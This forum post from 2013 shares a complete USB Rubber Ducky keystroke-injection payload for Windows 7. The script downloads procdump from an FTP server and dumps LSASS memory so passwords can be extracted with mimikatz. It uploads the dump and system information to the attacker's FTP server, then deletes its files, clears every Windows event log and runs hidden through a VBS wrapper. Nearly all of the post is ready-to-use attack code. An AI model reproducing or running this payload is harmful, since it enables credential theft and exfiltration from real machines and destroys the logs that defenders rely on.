[Payload] FTP LSASS grab

[waddell]

I'm sure this can be more discrete, and possibly faster, but this was the simplest way to get what I wanted done. Once you have the dmp file, just use mimikatz to find the passwords.

Note: Some of this needs to be edited for your FTP server's information (pay attention)

You may need to modify this for UAC

Thanks to:

https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/

https://forums.hak5.org/index.php?/topic/30103-payload-exfiltration-via-wifi/

http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

REM Payload: FTP LSASS dump for password stealing
REM Target: Windows 7
REM Author: Matt Waddell
REM Some information taken from other payloads on forums, but this is a nice working utility for dumping passwords to ftp server
REM Copies files to target machine and executes it hidden in background so you are very quick with the attack
REM There is probably many better ways to do what I am doing, but as a sys admin this is what I needed to prove a point

DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /F:OFF /V:ON /K
DELAY 500
ENTER

REM *** Some Quick Clean Up (Just In Case) ***
REM Will remove any existing files to make scripts work quicker and better
STRING if not exist C:\Temp md C:\Temp
ENTER
STRING erase /Q C:\Temp\procdump.exe
ENTER
STRING erase /Q C:\Temp\*.dmp
ENTER
STRING erase /Q C:\Temp\*.txt
ENTER
STRING erase /Q C:\Temp\*.bat
ENTER
STRING erase /Q C:\Temp\*.ftp
ENTER
STRING erase /Q C:\Temp\*.vbs
ENTER
STRING CD C:\Temp
ENTER


REM *** ftp_down.txt ***
REM Your download settings for grabbing procdump off your ftp server (minimizes need for local storage device) (modify as needed)
STRING copy con ftp_down.ftp
ENTER
STRING USER ***********
ENTER
STRING *******PASS*********
ENTER
STRING get procdump.exe C:\Temp\procdump.exe
ENTER
STRING bye
ENTER
CONTROL Z
ENTER


REM *** ftp_up.txt ***
REM Your upload settings for putting the lsass dump and some system information settings on your ftp server (modify as needed)
STRING copy con ftp_up.ftp
ENTER
STRING USER ***********
ENTER
STRING *******PASS*********
ENTER
STRING put C:\Temp\*.dmp
ENTER
STRING put C:\Temp\*.txt
ENTER
STRING bye
ENTER
CONTROL Z
ENTER


REM *** ftp_lsass.bat ***
REM Runs in background, downloads procdump, dumps passwords, uploads dump and system info, deletes all files, clears logs
STRING copy con ftp_lsass.bat
ENTER
STRING ftp -n -s:C:\Temp\ftp_down.ftp **********server*************
ENTER
STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp
ENTER
STRING systeminfo > C:\Temp\%COMPUTERNAME%_system.txt
ENTER
STRING ftp -n -s:C:\Temp\ftp_up.ftp **********server*************
ENTER
STRING erase /Q C:\Temp\procdump.exe
ENTER
STRING erase /Q C:\Temp\*.dmp
ENTER
STRING erase /Q C:\Temp\*.txt
ENTER
STRING erase /Q C:\Temp\*.ftp
ENTER
STRING erase /Q C:\Temp\*.vbs
ENTER
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
STRING del %0
ENTER
STRING exit
ENTER
CONTROL z
ENTER

REM *** VBS File for Running Invisibly ***
STRING copy con C:\Temp\invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run Primary Payload and Close Rubber Ducky Cmd Window (can remove ducky when it is closed, everything else is in background) ***
STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit
ENTER

Edited August 26, 2013 by waddell